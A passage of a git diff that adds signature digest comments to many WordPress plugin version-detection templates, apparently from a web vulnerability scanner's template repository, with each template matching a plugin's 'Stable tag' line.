a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c2735165c359a62362caa9dc2940856bd529681584d05b70f046b9aa38ac4b902204ffd5ced6808b59a8c62bcee226179a3a3cbb853f555dbefd4f8e1bf74e0394d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..0966778d1d 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100971f0e867db9fee6f82e8a9be2c8b11f025965ec0c40c4b254dcff50c6c1559302200d98519b412ce1e3f275592cbaf7bf50be10bf7994158d2550449b140cd1025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..0f4dd37339 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d9211a5d9755542f5e97ec2d5365fbb69045553c59d0215ad3088fef270ef0402200c48774e12ca64ab2fe4ffbc009488bb240ea029ec8c1e486612b4f6070dbeba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..40912e7bef 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c9a642ded85e17fb8d4614fa3319499bfad496c9174d610f4c00ad20bceff46022100af0250c6674f9432b1db7b2c47250b0967ca24e4bf46a48be2a655904180f5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..9f5ff70089 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f355efef4b0692c4a410999cf5c56273af728c685b077d903ddcd0a567c28555022004daf9c15c0344b0041158ac0127791fc33565296bbc9a9968387eda323b8382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..0fb2712213 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206fd6ac61652f09c38441af57e41332f1ef319ea9505fe7a6e25bb8b84c7300a2022100c6ea0c1bec0c9f30ae97e9e2f00bf5415d96e22083c66696a2d75a7233e41dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..85f9d4dd41 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0489e98cbee36f2d519ed2132aa4bdf98f6779595d172b48e0f58c4283256a40221008a1bb4e48bbf3b6f60f2e095145a9c42c76ab4973bdf60a56bdc8db93d143232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..484d05568e 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220726fdc56f174f32ce1f57633658bbbb931791c7aeeff5bc205ccdaf7236e66ca0221008d26077d5ab7cd4d7276f82370739051d062df947958aaf8eb9c74c5305381f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..1585a492a6 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202951798b98db029bf2c9ae44a87f6b104846f558f1ca3ce467630ae5ce8080c3022005255aae64b16cb658554563818968d3751bd18c2cbc87b8b297e54c098b270a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..9f9b0e9750 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040b4fa74071dbd6ccf8e709389f82680c43519f722c0ed279c90f8bfe825e607022100c22c19b7fcfb1be4b95ae6024ea7b7c4da2b9ab630d1e841d12cf1bfa8dea02b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..fc411f0477 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a49d790cbae6e8ee9cbbc511cb99457aa63aa54a546beef376343201e8132af2022100b1404cc4f5ea88e0cb03746155108d46554a0db6b0c0c5852ff68ab7bfbaf086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..cafa81c313 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1a96984dd342fad97ce049269e20792b61b25180e8f4e523bd9285d2d89a8e0022027fbb8b5536766efed03d45243dc8613eb00077d835e83ed780389dc4cf1ee85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..f95a8118cc 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a53804aff7c555d5171836d67825181371dfb00df4b3a87f8d54cace759b464022100df5e3683b2fbc48c5f293fe0cce80e61e1547500c6f7abb1307b7ac0afbb1010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..adac927a5e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfb8cde8ae0528d69319be09881727465c5fe17857dc14cade66e6f0c2ba91c0022100fb020e823514e6fa1976896ae24ff31d5aa807561974bf03bb2c55573304fca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..a4769c5d3b 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220322915d1f108443f4e019c02f11b6b5a24c9a7e19212bdbae9748d0f794ec59e022100b4d3fe5b326d5c4b90a4140fbca6cf9fa97ddef5ed33c9b87e60a02ea91e756d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..d162c1b520 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d929ba60a2428f629953b79440c66120cc0bcc6e55f65923c83a2fdaea8f4a6022100e398b6cff4a889199b8327740746152abae170b0f1287dd318a1ad93bbb0d662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..ff73541d73 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205700ef9265108765eb6ef02305c6401b9f77d509d274c66613303aac2b0a3ff1022100e12f2fedbc18ba082c5dd06490dd29075322adda40c0372485d30fff5c3d2a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..91d4bf2133 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ea22ab91bc487d3d8f3dcabf0473e6b439c7ae656b7b93df40b4e84ca01f8cec022054e04c83a65bc0a26e14717a788a738c16bca8424fa33e72050d29f7b2b91417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..f317947689 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6ccd9c980781936b5572b258ce57c70727457d2fa11148f7adb0d47809f78ce022100ca7a01cea79aa977f5e2b4d840b62a8baa7682331a329c57de081a553018070e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..e2a876e0a4 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ec24481b969b7fe79926434ce5997ee56735d0f324e9797e723f2be2684245902201a4eb35bf01842e25e438290d2439ea136e3af47013c07e67470617b46d189a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..8bddbbb2f3 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a520f8576ec2c087dcfc3d803870c50a06b9c747b006390a6d12c97da8ba6c9402201852665f83b31c97fad09b8f0ce3ea082f0519905ba189c65d0d739c8253a70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..b533d8586b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201aeafc2c156aa5c236c3a53f91cb30c96ec6af27c5645af68a60ef4589321f82022100cdf86fa7506d924657e2ae623c1ddba5b1cdd0c34d8d8403edf53f89d91d6607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..5c3d306310 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200090009450403f6a5a9ccfaa5554b1d4f3b4c033f74843dfd7163c6b74554c99022100a9ce85bb652b19abef9b998e31002a2cd318ba173e1af7a52ac11f36ae67b730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..da690aff05 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0643621521d09d1ddd33af33582bceb1cc4f3993ba987e11f94aee11c5b9a0a022019c2d80ba1e2fd3bd4ac5477df77d10a21c227ae9f83651e5a9f312b063169fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..e34d6eee96 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d32eea4909e812eeb6cbb21d6a7d775ccdcf4dba4ea353a05d9869981f96b60d022100d394ad44392227ff99a7455928b7bd49339575df062978eb92137ba7abf9c21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..5388d3fb87 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f266197e195711be19755b2333c27169c1bff48bd18844b72404f1c4e56780ec02201ade20f25fb874768c0ca7ed55c41da945270127af82098d42159266451eca89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..71630a2b8f 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220405e4a1e7aed40a6951a87cb55ad67b1ba5ff1b05d40b55d3b1fe9a8d9fdc076022061cec54bfca44a9d15499dd38cf7efa3f1b2f55f22aabe23a34f21506949fadd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..fddad02959 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220185c511b3ea86dbc15929f39e0acffa390f20547da5ba1a67280859d930ca1a302210087f4088b3d38bd3be7b72e7a5064ebb4d3ad40f005e63b9b0f907d0d65d27d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..a0b003c8a1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0a6c195ebb01da30f02273a7658ba98638bddcfce5416e721708e2c823506e7022100f69bdb41aab213e85154c6d1d8fd9c5419e7dc323438c51a6e7f569a3057dca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..9ad02e3e48 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057c3c6180869842efbca0f022730c41c022a25c13a7ac7c60aecf50d48e6cfb902206d2287e620ad689f4e1abc33501340d6f5172c1b40a6afafd9673a20703cae3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..e3d768d42a 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbf4651f37d9c426fb34140b73514ac1f9581c7c0b37016c6400a9257d8a1cca022025635eb46f739b1002dee1686dda3585a0959af9c42c8f4a85e7fd334f4dc150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..cddc6ed08d 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff471df4d02e6252c0df06c22f381c3b0caa74340f14e76cbf2fd32c950b546c02207a94e2b3e16614335ca466e85488033e09c8d317de342c98977aaa80e2a054e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..03bfd6ab66 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009f0cb09e0b36354a7135e113df10d72f46eb4cb2b7b1f1f3fd9ce0caf21fe240022100cca8ca9d1c038041afcdd2ce5f09e38ca199f1cfb537dc4e51edb423dc3fddb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..3d04f0008d 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f80d8e9f31836ab45221eec9bcbea0ee6bfbc11d2f8cde5292c1534c091cc4d022027db193cc72b4151d6ec16749760ce79b30c324459e936df25c7aaf074580a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..ee5b095b5e 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046a7a42e09b7804352f7200f88880e1fff60984ebabb7786d561ffdb0309a329022100aa44403ddfcee52e3b6f17bb8367305894b3cb383b6d544603d033a932c14ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..48076ff230 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207cb19141a5e73a34fda7560cadc98f1802f766b3ad45bb9aaed676d24ee23bbc02203a42c65c94b3323c003fda7a8a50dbb1aa9a932a292223842dee3daafef40bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..7bdaef021f 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a5be0f8d488a5218c14866a338df2448e550922277a63646d6558a382b3f52302202770cc1193758792312b7e9c46e0e5b3f53f6677170c942705d6a8fe00ae7a12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..c0b4d471f6 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100856e30449bcf8c2270d7fddffc9265eb7a7c52b6708f29e193a6cbc97acbad00022100cde8b4323cb87e74b61716b42ca67d08e1b459c864328ed8ed0734cc499641d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..f8c5d99985 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220674296ba3b413e9ac4bc2f53bbd6bd84498dc72fc902021c1fa31297365041420220307ca9760db7d79fc8fefc9613d8790582714d3415733f54521017223ace5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..5577561841 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066f47bf155f0a61d613ce4527ebf765a6b6cd7d1263053a1e19aed0337245849022036e8133d318d023222b700f082281b29376bbbd9795aa74dd58e2c3943c27224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..99e7f54fb0 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053b712332c6a17372c4e4c2429804460c0d60983768b00ab15160e82fc0bafc00220102a22621412f594e9bfdb6704ab13ec51a5e87aa98b8bd4f543da04d6aafad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..64bf3e4ff5 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c363a4777bf7de3c8ac0ac49bd1ff010a71e75ab0526b3139f0f99be51ea5c510220472e9a8b1eb4e17821a3d02984653eed6b0c2891add292f2ff7a898571e8ac0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..ff37d827ce 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc1214b926fcdce8bd4b3be920745258132de22d8b278b5b259fe60191e5bdf6022100ee23f9d08da6d70aa8b43d1174473c6f50a0d92a05ebadeb52920042e7de5271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..c4f6e37ba2 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050534122bf8436e12397ce8321323120bccda73a592c22e2ddb376b32649bc09022100da621ce9ac76ee869527ccd2c26c39129ba0cac73c2939ccbc3167a409ae6cd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..e849ae672a 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220328cb9ff0f8010583a1c709cfda57969f1ff4cf02be3204259213182aa29097b022014381bb2a9cd30dfbc93c0029aa68e594c6530dd73079df76841bbeffc273af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..2650418678 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220659f3b15197085fe67e165e3a459c7aa05b3c1de3088a9c4f47e712dc5c50537022100be59ac7af2a95d5535e06762c260073125e62a1f228d34c5888eb5277fcedd00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..8cb34f1712 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f327e5ec0b3d9e68658605b0b453e4f6b14808f6e7b2f8ec5cdff2ae90efd5dc022014578637d4d2ec9259d0599701b2cc6fe039d25871feeb9c8e9e4aa20a5bedc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..56faa963dc 100644 --- 